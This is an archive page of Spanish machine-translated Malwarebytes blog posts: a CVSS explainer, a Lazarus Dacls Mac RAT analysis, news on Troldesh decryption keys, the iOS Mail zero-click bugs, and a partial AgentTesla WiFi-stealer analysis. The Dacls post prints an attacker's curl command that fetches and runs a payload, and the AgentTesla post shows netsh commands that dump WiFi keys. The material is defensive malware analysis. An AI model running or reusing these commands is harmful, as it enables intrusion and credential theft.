Archivo de categoría Malwarebytes Empresas

Pormalwarebytes

Cómo funciona CVSS: caracterizando y puntuando vulnerabilidades

Cómo funciona CVSS: caracterizando y puntuando vulnerabilidades

Cómo funciona CVSS: caracterizando y puntuando vulnerabilidades

Al corriente: por 
Última actualización:

El Sistema de puntuación de vulnerabilidad común (CVSS) proporciona a los desarrolladores de software, evaluadores y profesionales de seguridad y TI un proceso estandarizado para evaluar vulnerabilidades. Puede usar el CVSS para evaluar el nivel de amenaza de cada vulnerabilidad y luego priorizar la mitigación en consecuencia.

Este artículo explica cómo funciona el CVSS, incluida una revisión de sus componentes, y describe la importancia de utilizar un proceso estandarizado para evaluar las vulnerabilidades.

¿Qué es una vulnerabilidad de software?

Una vulnerabilidad de software es cualquier debilidad en la base de código que puede ser explotada. Las vulnerabilidades pueden ser el resultado de una variedad de errores de codificación, que incluyen lógica defectuosa, mecanismos de validación inadecuados o falta de protección contra desbordamientos del búfer. Las API desprotegidas y los problemas aportados por bibliotecas de terceros también son fuentes comunes de vulnerabilidades.

Independientemente de la fuente de la vulnerabilidad, todos presentan algún riesgo para los usuarios y las organizaciones. Hasta que se descubren vulnerabilidades y parches , o se fijan en una actualización de software, los atacantes pueden explotar a dañar los sistemas, cortes de causa, robar datos, o implementar y malware propagación.

Cómo se informan las vulnerabilidades

La forma en que se informan las vulnerabilidades depende del tipo de software en el que se descubren y del tipo de vulnerabilidad que parecen ser. Además, la importancia percibida de la vulnerabilidad para el buscador es un factor en cómo se informa.

Por lo general, los investigadores de seguridad, los probadores de penetración y los propios usuarios encuentran e informan vulnerabilidades. Los investigadores de seguridad y los probadores de penetración pueden trabajar a tiempo completo para las organizaciones o pueden funcionar como autónomos que trabajan bajo un programa de recompensas de errores .

Cuando las vulnerabilidades son menores o el usuario puede solucionarlas fácilmente sin la ayuda del proveedor o de la comunidad, es más probable que los problemas no se notifiquen. Del mismo modo, si un investigador de sombrero negro o un ciberdelincuente descubre un problema grave , es posible que no se informe. En general, sin embargo, las vulnerabilidades se informan a las organizaciones o desarrolladores cuando se encuentran.

Si se encuentra una vulnerabilidad en el software propietario, se puede informar directamente al proveedor oa una organización de supervisión de terceros, como la organización de seguridad sin fines de lucro, MITRE . Si se encuentra uno en el software de código abierto, se puede informar a la comunidad en general, a los gerentes de proyecto o a un grupo de supervisión.

Cuando se informan vulnerabilidades a un grupo como MITRE, la organización asigna al problema un número de identificación y notifica al vendedor o al gerente del proyecto. La parte responsable tiene 30 a 90 días para desarrollar una solución o parchear el problema antes de que la información se haga pública. Esto reduce la posibilidad de que los atacantes puedan explotar la vulnerabilidad antes de que haya una solución disponible.

¿Qué es CVSS?

El Sistema de puntuación de vulnerabilidad común (CVSS) es un conjunto de estándares abiertos y gratuitos. Estos estándares son mantenidos por el Foro de Respuesta a Incidentes y Equipos de Seguridad (FIRST), una organización de seguridad sin fines de lucro. Los estándares usan una escala de 0.0 a 10.0, con 10.0 representando la mayor severidad. La versión más reciente lanzada es CVSS 3.1 , lanzada en junio de 2019.

Estos estándares se utilizan para ayudar a los investigadores de seguridad, usuarios de software y organizaciones de seguimiento de vulnerabilidades a medir e informar sobre la gravedad de las vulnerabilidades. CVSS también puede ayudar a los equipos de seguridad y desarrolladores a priorizar las amenazas y asignar recursos de manera efectiva.

Cómo funciona la puntuación CVSS

La puntuación CVSS se basa en una combinación de varios subconjuntos de puntuaciones. El único requisito para clasificar una vulnerabilidad con un CVSS es completar los componentes de puntaje base. Sin embargo, se recomienda que los reporteros también incluyan puntajes temporales y métricas ambientales para una evaluación más precisa.

El puntaje base del CVSS se evalúa utilizando una subpunta de explotabilidad, una subpunta de impacto y una subpunta de alcance. Estos tres contienen métricas para evaluar el alcance de los ataques, la importancia de los datos y sistemas afectados, y el subpunto del alcance evalúa el impacto del ataque en sistemas aparentemente no afectados.

Puntaje base

El puntaje base está destinado a representar las cualidades inherentes de una vulnerabilidad. Estas cualidades no deberían cambiar con el tiempo ni deberían depender de ambientes individuales. Para calcular el puntaje base, los reporteros deben calcular el compuesto de tres subpuntos.

Puntaje de explotabilidad

El subpunto de explotabilidad mide las cualidades de un componente vulnerable. Estas cualidades ayudan a los investigadores a definir con qué facilidad los atacantes pueden explotar una vulnerabilidad. Este subpunto se compone de las siguientes métricas:

Métrico Medición Escala (de menor a mayor)
Vector de ataque (AV) Qué fácil es para los atacantes acceder a una vulnerabilidad Físico (presencia)
Local (presencia)
Adyacente (redes conectadas)
Red (remota)
Complejidad de ataque (AC) ¿Qué requisitos previos son necesarios para la explotación? Bajo
alto
Privilegios requeridos (PR) El nivel de privilegios necesarios para explotar la vulnerabilidad. Ninguno
Bajo
Alto
Interacción del usuario (UI) Si la explotación requiere acciones de un usuario terciario Binario: ninguno o obligatorio

Puntaje de impacto

El subpunto de impacto mide los efectos que la explotación exitosa tiene en el componente vulnerable. Define cómo se ve afectado un componente en función del cambio de explotación previa a posterior. Este subpunto se compone de las siguientes métricas:

Métrico Medición Escala
Confidencialidad (C) Pérdida de confidencialidad de datos en el componente o sistemas más amplios. Ninguno
Bajo
Alto
Integridad (I) Pérdida de integridad de datos en todo el sistema de componentes. Ninguno
Bajo
Alto
Disponibilidad (A) Pérdida de disponibilidad del componente o sistemas conectados. Ninguno
Bajo
Alto

Alcance de la calificación

El puntaje del alcance mide qué impacto puede tener una vulnerabilidad en componentes distintos al afectado por la vulnerabilidad. Intenta dar cuenta del daño general del sistema que un atacante puede ejecutar explotando la vulnerabilidad reportada. Esta es una puntuación binaria con un alcance que se cambia o no cambia.

Puntuación temporal

La puntuación temporal mide aspectos de la vulnerabilidad de acuerdo con su estado actual como vulnerabilidad conocida. Este puntaje incluye las siguientes métricas:

Métrico Medición Escala (de menor a mayor)
Explotar código de madurez (E) La disponibilidad de herramientas o código que pueden utilizarse para explotar la vulnerabilidad. Prueba de concepto
funcional
no probados
de alta
No definido
Nivel de remediación (RL) El nivel de remediación actualmente disponible para los usuarios Arreglo oficial
Solución
temporal Arreglo temporal No
disponible
No definido
Informe de confianza (RC) El grado de precisión del informe de vulnerabilidad. Desconocido
Razonable
Confirmado
No definido

Métricas ambientales

Las métricas ambientales miden la gravedad de la vulnerabilidad ajustada por su impacto en los sistemas individuales . Estas métricas son personalizaciones de las métricas utilizadas para calcular la puntuación base. Las métricas ambientales son más útiles cuando se aplican internamente por equipos de seguridad que calculan la gravedad en relación con sus propios sistemas.

La importancia de la estandarización.

CVSS proporciona pautas integrales para evaluar vulnerabilidades. Este sistema de puntuación es utilizado por muchos y tiene una amplia gama de aplicaciones. Sin embargo, quizás el aspecto más importante del CVSS es que proporciona un estándar unificado para todas las partes relevantes. La estandarización es crucial al responder a los riesgos y priorizar la mitigación.

Los puntajes CVSS son más que un medio de estandarización. Estos puntajes tienen aplicaciones prácticas y pueden tener un impacto significativo para ayudar a los equipos de seguridad y desarrolladores de productos a priorizar sus esfuerzos. 

Dentro de una organización, los equipos de seguridad pueden usar los puntajes CVSS para asignar eficientemente recursos limitados. Estos recursos pueden incluir capacidades de monitoreo, tiempo dedicado a parches o incluso búsqueda de amenazas para determinar si una vulnerabilidad ya ha sido explotada. Esto es particularmente valioso para equipos pequeños que pueden no tener los recursos necesarios para abordar cada vulnerabilidad.

Los puntajes CVSS también pueden ser útiles para los investigadores de seguridad. Estos puntajes pueden ayudar a resaltar componentes que son especialmente vulnerables o tácticas y herramientas que son particularmente efectivas. Luego, los investigadores pueden aplicar este conocimiento al desarrollo de nuevas prácticas y herramientas de seguridad para ayudar a detectar y eliminar amenazas desde el principio. 

Finalmente, los puntajes de CVSS pueden ser informativos para los desarrolladores y evaluadores en la prevención de vulnerabilidades en primer lugar. Un análisis cuidadoso de las vulnerabilidades de alto rango puede ayudar a los equipos de desarrollo de software a priorizar las pruebas. También puede ayudar a resaltar áreas donde se pueden mejorar las mejores prácticas de seguridad de código. En lugar de esperar hasta que se descubra que su propio producto es vulnerable, los equipos pueden aprender de los errores de otros

Pormalwarebytes

Nueva variante de malware para Mac de Lazarus Dacls RAT distribuida a través de la aplicación Trojanized 2FA

Nueva variante para Mac de Lazarus Dacls RAT distribuida a través de la aplicación Trojanized 2FA

Nueva variante de malware para Mac de Lazarus Dacls RAT distribuida a través de la aplicación Trojanized 2FA

Al corriente: por el 

Esta publicación de blog fue escrita por Hossein Jazi, Thomas Reed y Jérôme Segura.

Recientemente identificamos lo que creemos que es una nueva variante del troyano de acceso remoto Dacls (RAT) asociado con el grupo Lazarus de Corea del Norte, diseñado específicamente para el sistema operativo Mac.

Dacls es una RAT que fue descubierta por Qihoo 360 NetLab en diciembre de 2019 como un troyano de acceso remoto encubierto totalmente funcional dirigido a las plataformas Windows y Linux.

Esta versión de Mac al menos se distribuye a través de una aplicación de autenticación de dos factores troyanada para macOS llamada MinaOTP, utilizada principalmente por hablantes chinos. Similar a la variante de Linux, cuenta con una variedad de características que incluyen ejecución de comandos, administración de archivos, proxy de tráfico y escaneo de gusanos.

Descubrimiento

El 8 de abril, una aplicación sospechosa de Mac llamada «TinkaOTP» fue enviada a VirusTotal desde Hong Kong. No fue detectado por ningún motor en ese momento.

El ejecutable malicioso del bot se encuentra en el directorio «Contents / Resources / Base.lproj /» de la aplicación y pretende ser un archivo nib («SubMenu.nib») mientras es un archivo ejecutable de Mac. Contenía las cadenas «c_2910.cls» y «k_3872.cls», que son los nombres de los archivos de certificado y clave privada que se habían observado anteriormente.

Persistencia

Esta RAT persiste a través de LaunchDaemons o LaunchAgents que toman un archivo de lista de propiedades (plist) que especifica la aplicación que debe ejecutarse después del reinicio. La diferencia entre LaunchAgents y LaunchDaemons es que LaunchAgents ejecuta el código en nombre del usuario conectado, mientras que LaunchDaemon ejecuta el código como usuario root.

Cuando se inicia la aplicación maliciosa, crea un archivo plist con el nombre «com.aex-loop.agent.plist» en el directorio «Library / LaunchDaemons». El contenido del archivo plist está codificado dentro de la aplicación.

 El programa también verifica si «getpwuid (getuid ())» devuelve la identificación de usuario del proceso actual. Si se devuelve una identificación de usuario, crea el archivo plist «com.aex-loop.agent.plist» en el directorio LaunchAgents: «Library / LaunchAgents /».

Figura 1: archivo Plist

El nombre del archivo y el directorio para almacenar el plist están en formato hexadecimal y se agregan juntos. Muestran el nombre de archivo y el directorio al revés.

Figura 2: Directorio y generación de nombre de archivo

Archivo de configuración

El archivo de configuración contiene la información sobre la máquina de la víctima, como Puid, Pwuid, complementos y servidores C&C. El contenido del archivo de configuración se cifra utilizando el algoritmo de cifrado AES.

Figura 3: Cargar config

 Las variantes de Mac y Linux usan la misma clave AES y IV para cifrar y descifrar el archivo de configuración. El modo AES en ambas variantes es CBC.

Figura 4: Clave AES y IV

La ubicación y el nombre del archivo de configuración se almacenan en formato hexadecimal dentro del código. El nombre del archivo de configuración pretende ser un archivo de base de datos relacionado con Apple Store:

«Biblioteca / Caches / Com.apple.appstore.db»

Figura 5: Nombre del archivo de configuración

La función «IntializeConfiguration» inicializa el archivo de configuración con los siguientes servidores C&C codificados.

Figura 6: Inicializar archivo de configuración

El archivo de configuración se actualiza constantemente al recibir comandos del servidor C&C. El nombre de la aplicación después de la instalación es «mina». Mina proviene de la aplicación MinaOTP , que es una aplicación de autenticación de dos factores para macOS.

Figura 7: El archivo de configuración se está actualizando

Bucle principal

Después de inicializar el archivo de configuración, el bucle principal se ejecuta para realizar los siguientes cuatro comandos principales:

  • Cargue la información del servidor C&C desde el archivo de configuración al servidor (0x601)
  • Descargue el contenido del archivo de configuración del servidor y actualice el archivo de configuración (0x602)
  • Cargue la información recopilada de la máquina de la víctima llamando a la función «getbasicinfo» (0x700)
  • Enviar información de latidos (0x900)

Los códigos de comando son exactamente los mismos que Linux.dacls.

Figura 8: lazo principal

Complementos

Esta Mac RAT tiene los seis complementos vistos en la variante de Linux con un complemento adicional llamado «SOCKS». Este nuevo complemento se usa para proxy del tráfico de red de la víctima al servidor C&C.

La aplicación carga los siete complementos al comienzo del bucle principal. Cada complemento tiene su propia sección de configuración en el archivo de configuración que se cargará en la inicialización del complemento.

Figura 9: Complementos cargados

Complemento CMD

El complemento cmd es similar al complemento «bash» en la rata Linux que recibe y ejecuta comandos al proporcionar un shell inverso al servidor C&C.

Figura 10: Complemento Cmd

Complemento de archivo

El complemento de archivo tiene la capacidad de leer, eliminar, descargar y buscar archivos dentro de un directorio. La única diferencia entre la versión de Mac y Linux es que la versión de Mac no tiene la capacidad de escribir archivos (Caso 0).

Figura 11: Complemento de archivo

Complemento de proceso

El complemento de proceso tiene la capacidad de matar, ejecutar, obtener ID de proceso y recopilar información de proceso.

Figura 12: Complemento de proceso

Si se puede acceder al directorio «/ proc /% d / task» de un proceso, el complemento obtiene la siguiente información del proceso donde% d es el ID del proceso:

  • Argumentos de la línea de comando del proceso ejecutando «/ proc /% / cmdline»
  • Nombre, Uid, Gid, PPid del proceso desde el archivo «/ proc /% d / status».

Complemento de prueba

El código para el complemento de prueba entre Mac y Linux es el mismo. Comprueba la conexión a una IP y un puerto especificados por los servidores de C&C.

RP2P plugin

El complemento RP2P es un servidor proxy utilizado para evitar las comunicaciones directas de la víctima a la infraestructura del actor.

Figura 13: P2P inverso

Complemento LogSend

El complemento Logsend contiene tres módulos que:

  • Verificar la conexión al servidor de registro
  • Escanear red (módulo de escáner de gusanos)
  • Ejecutar comandos del sistema a largo plazo
Figura 14: Complemento Logsend

Este complemento envía los registros recopilados mediante solicitudes de publicación HTTP.

Figura 15: Agente de usuario

Una función interesante en este complemento es el escáner de gusanos. El «start_worm_scan» puede escanear una subred de red en los puertos 8291 u 8292. La subred que se escanea se determina en función de un conjunto de reglas predefinidas. El siguiente diagrama muestra el proceso de selección de la subred para escanear.

Figura 16: Exploración de gusanos

Complemento de calcetines

El complemento Socks es el nuevo séptimo complemento agregado a esta Mac Rat. Es similar al complemento RP2P y actúa como intermediario para dirigir el tráfico entre la infraestructura de bot y C&C. Utiliza Socks4 para sus comunicaciones proxy.

Figura 17: Calcetines4

Comunicaciones de red

La comunicación C&C utilizada por This Mac RAT es similar a la variante de Linux. Para conectarse al servidor, la aplicación primero establece una conexión TLS y luego realiza la señalización y finalmente encripta los datos enviados a través de SSL utilizando el algoritmo RC4.

Figura 18: Tráfico generado por la aplicación (.mina)
Figura 19: conexión TLS

Las variantes de Mac y Linux usan la biblioteca WolfSSL para las comunicaciones SSL. WolfSSL es una implementación de código abierto de TLS en C que admite múltiples plataformas. Esta biblioteca ha sido utilizada por varios actores de amenazas. Por ejemplo, Tropic Trooper usó esta biblioteca en su malware Keyboys .

Figura 20: WolfSSL

Los códigos de comando utilizados para balizar son los mismos que los códigos utilizados en Linux.dacls. Esto es para confirmar la identidad del bot y el servidor.

Figura 21: Beconing

La clave RC4 se genera utilizando una clave codificada.

Figura 22: Inicialización RC4

Variantes y detección

También identificamos otra variante de esta RAT que descarga la carga maliciosa utilizando el siguiente comando curl:

curl -k -o ~ / Library / .mina https://loneeaglerecords.com/wp-content/uploads/2020/01/images.tgz.001> / dev / null 2> & 1 && chmod + x ~ / Library / .mina> / dev / null 2> & 1 && ~ / Library / .mina> / dev

Creemos que esta variante Mac del Dcals RAT está asociada con el grupo Lazarus, también conocido como Hidden Cobra y APT 38, un infame actor de amenaza norcoreano que realiza operaciones de ciberespionaje y cibercrimen desde 2009. 

Se sabe que el grupo es uno de los actores más sofisticados, capaz de crear malware personalizado para apuntar a diferentes plataformas. El descubrimiento de esta RAT de Mac muestra que este grupo APT está desarrollando constantemente su conjunto de herramientas de malware.

Malwarebytes para Mac detecta este troyano de administración remota como OSX-DaclsRAT.

COI

899e66ede95686a06394f707dd09b7c29af68f95d22136f0a023bfd01390ad53
846d8647d27a0d729df40b13a644f3bffdc95f6d0e600f2195c85628d59f1dc6
216a83e54cac48a75b7e071d0262d98739c840fd8cd6d0b48a9c166b69acd57d
d3235a29d254d0b73ff8b5445c962cd3b841f487469d60a02819c0eb347111dd
d3235a29d254d0b73ff8b5445c962cd3b841f487469d60a02819c0eb347111dd
loneeaglerecords [.] com / wp-content / uploads / 2020/01 / images.tgz.001 
67.43.239.146
185.62.58.207
50.87.144.227
Pormalwarebytes

Los ciberdelincuentes lanzan claves de descifrado de Troldesh

Los actores de amenazas lanzan claves de descifrado de Troldesh

Los ciberdelincuentes lanzan claves de descifrado de Troldesh

Al corriente: por 

Un usuario de GitHub que afirma representar a los autores del Troldesh Ransomware que se hacen llamar el «equipo de Shade» publicó esta declaración el domingo pasado:

“Somos el equipo que creó un encriptador de troyanos conocido principalmente como Shade, Troldesh o Encoder.858. De hecho, detuvimos su distribución a fines de 2019. Ahora tomamos la decisión de poner el último punto en esta historia y publicar todas las claves de descifrado que tenemos (más de 750 mil). También estamos publicando nuestro descifrado suave; También esperamos que, teniendo las claves, las compañías de antivirus emitan sus propias herramientas de descifrado más fáciles de usar. Todos los demás datos relacionados con nuestra actividad (incluidos los códigos fuente del troyano) se destruyeron irrevocablemente. Pedimos disculpas a todas las víctimas del troyano y esperamos que las claves que publicamos les ayuden a recuperar sus datos «.

¿Son estas las verdaderas claves de descifrado de Troldesh?

Si. Desde que se publicaron la declaración y las claves, las claves se han verificado ya que nuestros amigos de Kaspersky han confirmado la validez de las claves y están trabajando en una herramienta de descifrado . Esa herramienta se agregará al proyecto No More Ransom . El sitio web «No More Ransom» es una iniciativa de la Unidad Nacional de Delitos de Alta Tecnología de la policía holandesa, el Centro Europeo de Delitos Cibernéticos de Europol, Kaspersky y McAfee con el objetivo de ayudar a las víctimas de ransomware a recuperar sus datos cifrados sin tener que pagarles a los delincuentes.

En el pasado, algunas herramientas de descifrado para algunas de las variantes de Troldesh ya se habían publicado en el sitio web «No More Ransom». Actualizaremos esta publicación cuando se libere el descifrador de Kaspersky y nos gustaría advertir que no se sigan las instrucciones en GitHub a menos que sea un usuario muy hábil. Los pocos días adicionales de espera no deberían doler tanto y un intento fallido puede hacer que los archivos sean completamente inútiles.

¿Cuándo es útil usar la herramienta de descifrado de Troldesh?

Antes de salir y ejecutar esta herramienta esperada en su computadora victimizada tan pronto como salga, verifique si sus archivos cifrados tienen una de estas extensiones:

  • xtbl
  • ytbl
  • hacerse malo
  • Heisenberg
  • Mejor llamar a Saul
  • los_pollos
  • Código da Vinci
  • magic_software_syndicate
  • windows10
  • windows8
  • no_more_ransom
  • Tyson
  • crypted000007
  • crypted000078
  • rsa3072
  • descifrarlo
  • diestro
  • miami_california

Si las extensiones de archivo de su (s) sistema (s) afectado (s) no coinciden con una en la lista anterior, entonces sus archivos están fuera del alcance de esta herramienta de descifrado. Si encuentra una coincidencia, debe esperar a que se publique la herramienta de descifrado.

¿Por qué esta pandilla publicaría las claves de descifrado de Troldesh?

La razón de todo esto es desconocida y está sujeta a especulación. Podemos imaginar algunas razones diferentes. De poco probable a creíble.

  • Tal vez su conciencia los alcanzó. Después de todo, se disculpan con las víctimas. Pero estas son solo las víctimas que no pagaron o no pudieron recuperar sus archivos a pesar de pagar el rescate.
  • El equipo de Shade puede sospechar que alguien ha violado su bóveda de claves y se vio obligado o decidió por su propia cuenta publicar las claves por ese motivo. Pero no hemos visto reclamos para apoyar esa posibilidad.
  • La rentabilidad del ransomware había alcanzado su límite. Ransom.Troldesh existe desde 2014 y vimos un fuerte aumento de detección una vez que los actores de la amenaza se aventuraron fuera de los objetivos rusos en febrero de 2019. Pero después de ese aumento inicial, el número de detecciones se desvaneció gradualmente. Sin embargo, todavía estaba activo y generaba dinero.
Ransom.Troldesh detecciones con el tiempo
Número de detecciones de Malwarebytes de Ransom.Troldesh desde julio de 2018 hasta abril de 2020
  • El desarrollo de este ransomware ha alcanzado su límite técnico y el equipo se centrará en un nuevo proyecto de software. El equipo declaró haber detenido la distribución a fines de 2019, pero no pudo revelar en qué están trabajando actualmente.

Lo que sabemos

Todo lo que sabemos con certeza es que las claves han sido verificadas y una herramienta de descifrado está en proceso. Todo lo demás son especulaciones basadas en una declaración hecha en GitHub por una cuenta con el nombre de “sombra-equipo” que se unió a GitHub el 25 de abril ª , justo antes de la declaración.

Las víctimas pueden mantener los ojos bien abiertos para el lanzamiento de la herramienta de descifrado. Nos mantendremos informados.

Pormalwarebytes

El error de correo de iOS permite ataques remotos de clic cero

El error de correo de iOS permite ataques remotos de clic cero

El error de correo de iOS permite ataques remotos de clic cero

Al corriente: por 

El lunes, ZecOps lanzó un informe sobre un par de vulnerabilidades con la aplicación Mail en iOS . Estas vulnerabilidades permitirían a un atacante ejecutar código arbitrario en la aplicación Mail o en el proceso de maild que ayuda a la aplicación Mail detrás de escena. Sin embargo, lo más preocupante es el hecho de que incluso la versión más actual de iOS, 13.4.1, es vulnerable.

La forma en que funciona el ataque es que el actor de la amenaza envía un mensaje de correo electrónico diseñado para causar un desbordamiento del búfer en Mail (o maild). Un desbordamiento del búfer es un error en el código que permite que ocurra un ataque si el actor de la amenaza puede llenar un bloque de memoria más allá de su capacidad. Esencialmente, el atacante escribe datos basura que llenan la memoria, luego escribe código que sobrescribe el código existente en la memoria contigua, que luego es ejecutado por el proceso vulnerable.

Las malas noticias

Las vulnerabilidades reveladas por ZecOps permitirían a un atacante usar un desbordamiento de búfer para atacar un dispositivo iOS de forma remota, en dispositivos con iOS 6 a través de iOS 13.4.1. (ZecOps escribe que puede funcionar incluso en versiones anteriores de iOS, pero no lo probaron).

En iOS 12, el ataque no requiere nada más que ver un mensaje de correo electrónico malicioso en la aplicación Correo. No requeriría tocar un enlace o cualquier otro contenido dentro del mensaje. En iOS 13, la situación es peor, ya que el ataque puede llevarse a cabo contra el proceso maild en segundo plano, sin requerir ninguna interacción del usuario (es decir, es una «vulnerabilidad de clic cero»).

En el caso de infección en iOS 13, no habría signos significativos de infección, aparte de la lentitud temporal de la aplicación de correo. En algunos casos, la evidencia de un ataque fallido puede estar presente en forma de mensajes que no tienen contenido y no se pueden mostrar.

Los mensajes, que se muestran en la imagen de arriba del blog de ZecOps, pueden estar visibles por un tiempo limitado. Una vez que un ataque tiene éxito, el atacante presumiblemente usaría el acceso a la aplicación de Correo para eliminar estos mensajes, de modo que el usuario nunca los vea.

Las buenas noticias

Sé cómo suena esto. Este es un ataque que puede ser realizado por cualquier actor de amenazas que tenga su dirección de correo electrónico, en la última versión de iOS, y la infección ocurre en segundo plano sin requerir la acción del usuario. ¿Cómo hay buenas noticias aquí?

Afortunadamente, la hay. Las vulnerabilidades reveladas por ZecOps solo permiten un ataque de la aplicación de correo en sí. Usando esas vulnerabilidades, un atacante podría capturar sus mensajes de correo electrónico, así como modificar y eliminar mensajes. Presumiblemente, el atacante también podría realizar otras operaciones normales de correo, como enviar mensajes desde su dirección de correo electrónico, aunque esto no se mencionó. Si bien esto no es exactamente reconfortante, está lejos de comprometer todo el dispositivo.

Para lograr un compromiso total del dispositivo, el atacante necesitaría tener otra vulnerabilidad. Esto significa que si tiene la versión 13.4.1, requeriría una vulnerabilidad públicamente desconocida, lo que en su mayor parte restringiría dicho ataque a un adversario a nivel de estado-nación.

En otras palabras, alguien tendría que estar dispuesto a arriesgarse a quemar una vulnerabilidad de día cero, con un valor potencial de un millón de dólares o más, para infectar su teléfono. Esto significa que es poco probable que se infecte a menos que algún gobierno hostil u otro grupo poderoso esté interesado en espiarlo.

Si usted es, por ejemplo, un defensor de los derechos humanos que trabaja contra un régimen represivo, o un miembro de una minoría oprimida en ese país, puede ser un objetivo. Del mismo modo, si usted es un periodista que cubre tales noticias, puede ser un objetivo. También podría estar en riesgo si es una persona de negocios importante, como un CEO o CFO en una corporación importante, o si desempeña un papel importante en el gobierno. La persona promedio no estará en riesgo significativo de este tipo de ataque.

¿Por qué revelar ahora?

Es una práctica común como parte de la «divulgación responsable» evitar la mención pública de una vulnerabilidad importante hasta después de que se haya solucionado, o hasta que haya pasado el tiempo suficiente para creer que el proveedor de software o hardware no tiene la intención de corregir la vulnerabilidad en un de manera oportuna. La publicación de este tipo de información antes de que haya una solución disponible puede generar un mayor peligro para los usuarios, ya que los piratas informáticos que descubren que existe una vulnerabilidad pueden encontrarla por sí mismos.

Por supuesto, esto debe equilibrarse con el riesgo de ataques existentes que no se detectan. La divulgación puede ayudar a las personas que están bajo ataque activo a descubrir el problema, y ​​puede ayudar a las personas que aún no están bajo ataque a aprender cómo prevenir un ataque.

Con esto en mente, ZecOps mencionó tres razones por las que eligieron divulgar ahora:

  1. Dado que las vulnerabilidades reveladas no se pueden utilizar para comprometer todo el dispositivo sin vulnerabilidades adicionales, el riesgo de divulgación es menor.
  2. Apple ha lanzado una versión beta de iOS 13.4.5, que aborda el problema. Aunque una solución en beta no es exactamente lo mismo que una solución en una versión pública, un atacante podría analizar los cambios en la versión beta, lo que conduciría al descubrimiento de las vulnerabilidades. Esencialmente, las vulnerabilidades ya se han revelado a hackers maliciosos, pero el público no lo sabía.
  3. Al menos seis organizaciones estaban bajo ataque activo usando estas vulnerabilidades. (Las organizaciones no fueron nombradas).

Que deberias hacer

Primero, no se asuste. Como se mencionó, este no es un ataque generalizado contra todos los que usan un iPhone. En el pasado, se han utilizado otras vulnerabilidades de clic cero para enviar malware a los iPhones, pero ninguna se ha generalizado. Esto se debe a que cuanto más se generaliza un ataque de este tipo, es más probable que sea detectado y luego reparado por Apple.

Para proteger su inversión en vulnerabilidades de día cero de iOS de un millón de dólares, las organizaciones poderosas usan esas vulnerabilidades con moderación, solo contra individuos o grupos específicos. Por lo tanto, a menos que seas alguien que podría ser el objetivo de una nación hostil u otra organización poderosa, es probable que no estés en peligro.

Sin embargo, el riesgo aumenta después de la divulgación, ya que los piratas informáticos malintencionados pueden descubrir y utilizar la vulnerabilidad para atacar al correo, al menos. Por lo tanto, tampoco debe ignorar el riesgo.

Por mucho que me gustaría decir: «Instalar Malwarebytes, ejecutar un análisis y eliminar el malware», no puedo. A diferencia de macOS, la instalación de software antivirus no es posible en iOS, debido a las restricciones de Apple. Por lo tanto, no hay software que pueda escanear un iPhone o iPad en busca de malware.

Esto, más la falta de síntomas notables, significa que será difícil determinar si ha sido afectado. Como siempre con iOS, si tiene razones para creer que ha sido infectado, su única opción es restablecer su dispositivo al estado de fábrica y configurarlo desde cero como si fuera un dispositivo nuevo.

En cuanto a las precauciones para evitar la infección, hay un par de cosas que puede hacer. Una sería instalar el iOS 13.4.5 beta, que contiene una solución para el error. Sin embargo, esto no es algo fácil de hacer, ya que necesita una cuenta de desarrollador de Apple para descargar la versión beta. Además, el uso de una versión beta de iOS, que puede tener errores, no se recomienda para todos los usuarios.

La otra posible medida de seguridad sería deshabilitar Mail hasta que se publique públicamente la próxima versión de iOS. Para hacerlo, abra la aplicación Configuración y desplácese hacia abajo hasta Contraseña y cuentas. Toque eso, luego mire la lista de cuentas.

Puede tener varias cuentas, como se muestra arriba, o solo una. Para cualquier cuenta que diga «Correo» debajo, eso significa que está usando Correo para descargar el correo de esa cuenta. Toque en cada cuenta y, en la siguiente pantalla, busque la alternancia de Correo.

La imagen de arriba muestra que Mail está habilitado. Mueva el interruptor a apagado. Haga esto para cada una de sus cuentas y no vuelva a activar el correo hasta que haya actualizado a una versión de iOS más reciente que 13.4.1.

Pormalwarebytes

Nueva variante AgentTesla que roba credenciales de WiFi

Nueva variante AgentTesla roba credenciales de WiFi

Nueva variante AgentTesla que roba credenciales de WiFi

Al corriente: por 

AgentTesla es un infostealer basado en .Net que tiene la capacidad de robar datos de diferentes aplicaciones en máquinas víctimas, como navegadores, clientes FTP y descargadores de archivos. El actor detrás de este malware lo mantiene constantemente agregando nuevos módulos. Uno de los nuevos módulos que se ha agregado a este malware es la capacidad de robar perfiles WiFi.

AgentTesla fue visto por primera vez en 2014, y desde entonces ha sido utilizado frecuentemente por ciberdelincuentes en varias campañas maliciosas. Durante los meses de marzo y abril de 2020, se distribuyó activamente a través de campañas de spam en diferentes formatos, como ZIP, CAB, MSI, archivos IMG y documentos de Office.

Las variantes más recientes de AgentTesla que se ven en la naturaleza tienen la capacidad de recopilar información sobre el perfil WiFi de una víctima, posiblemente para usarlo como una forma de propagarse a otras máquinas. En este blog, revisamos cómo funciona esta nueva característica.

Análisis técnico

La variante que analizamos fue escrita en .Net. Tiene un ejecutable incrustado como un recurso de imagen, que se extrae y ejecuta en tiempo de ejecución (Figura 1).

Figura 1. Extraiga y ejecute la carga útil.

Este ejecutable (ReZer0V2) también tiene un recurso que está encriptado. Después de realizar varias comprobaciones de anti-depuración, anti-sandboxing y anti-virtualización, el ejecutable descifra e inyecta el contenido del recurso en sí mismo (Figura 2).

Figura 2. Descifrar y ejecutar la carga útil.

La segunda carga útil (owEKjMRYkIfjPazjphIDdRoPePVNoulgd) es el componente principal de AgentTesla que roba credenciales de navegadores, clientes FTP, perfiles inalámbricos y más (Figura 3). La muestra está muy ofuscada para dificultar el análisis a los investigadores.

Figura 3. Segunda carga útil

Para recopilar credenciales de perfil inalámbrico, se crea un nuevo proceso «netsh» al pasar «wlan show profile» como argumento (Figura 4). Los nombres de WiFi disponibles se extraen luego aplicando una expresión regular: “Todos los perfiles de usuario *: (? <perfil>. *)”, En la salida estándar del proceso.

Figura 4 Crear proceso de netsh

En el siguiente paso para cada perfil inalámbrico, se ejecuta el siguiente comando para extraer la credencial del perfil: «netsh wlan show profile PRPFILENAME key = clear» (Figura 5).

Figura 5. Extraer credenciales de WiFi

Cifrado de cadenas

Todas las cadenas utilizadas por el malware están cifradas y descifradas por el algoritmo de  cifrado simétrico Rijndael en la función «<Module>. \ U200E». Esta función recibe un número como entrada y genera tres conjuntos de bytes que contienen la entrada a descifrar, clave y IV (Figura 6).

Figura 6. Fragmento de función

Por ejemplo, en la Figura 5, «119216» se descifra en «wlan show profile name =» y «119196» se descifra en «key = clear».

